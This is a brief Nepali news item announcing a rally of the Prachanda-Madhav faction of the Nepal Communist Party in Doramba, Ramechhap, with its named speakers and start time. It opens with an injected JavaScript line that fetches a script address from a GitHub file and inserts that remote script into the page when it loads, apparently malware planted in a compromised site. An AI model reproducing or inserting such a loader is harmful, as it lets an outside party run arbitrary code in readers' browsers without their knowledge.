;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०७,
रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रचण्ड -माधब समूहको दोरम्बामा बृहत जनसभा हुने भएको छ ।
सो समूहको गाउँपालिका वडा नं कमिटीद्वरा आयोजना गरिएको भेलालाई स्थायी कमिटी लिलामाणी पोखरेलले सम्बोधन गर्ने नेकपाले जनाएको छ ।
त्यस्तै सभालाई पूर्व संविधान सभा सदस्य एवं पार्टीका जिल्ला इन्चार्ज देवशंखर पौडेल, विघटित प्रतिनिधिसभाका सांसद् एवं सह –इन्चार्ज श्यामकुमार श्रेष्ठ, नेकपा विदेश विभाग प्रमुख युवराज चौलागाई लगायतले सम्बोधन गर्ने कार्यक्रम रहेको छ ।
भेला बिहान ११ बजेबाट सुरु हुने जनाएको छ ।
फेसबुक प्रतिक्रियाहरु